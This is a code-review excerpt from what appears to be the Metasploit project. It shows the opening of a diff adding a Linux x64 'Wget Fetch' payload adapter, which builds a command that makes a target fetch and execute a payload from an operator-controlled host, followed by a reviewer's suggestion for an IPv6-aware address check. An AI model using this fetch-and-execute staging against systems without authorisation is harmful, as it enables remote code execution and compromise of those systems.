modules/payloads/adapters/cmd/linux/x64/wget.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Exploit::EXE
+  include Msf::Payload::Adapter
+  include Msf::Payload::Adapter::Fetch
+  include Msf::Payload::Adapter::Fetch::WgetHttp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wget Fetch',
+        'Description' => 'Fetch and Execute an x64 payload from a command via wget',
+        'Author' => 'Brendan Watters',
+        'Platform' => 'linux',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X64,
+        'AdaptedPlatform' => 'linux',
+        'RequiredCmd' => 'wget'
+      )
+    )
+  end
+
+  def download_uri
+    srvhost = datastore['FETCH_SRVHOST']
+    srvport = datastore['FETCH_SRVPORT']
+    proto = datastore['WGET_PROTOCOL']
+    uri = datastore['FETCH_URIPATH']
+    if srvhost == '0.0.0.0'
```

Comment:
A better check would be this to also catch IPv6 addresses:

`Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0`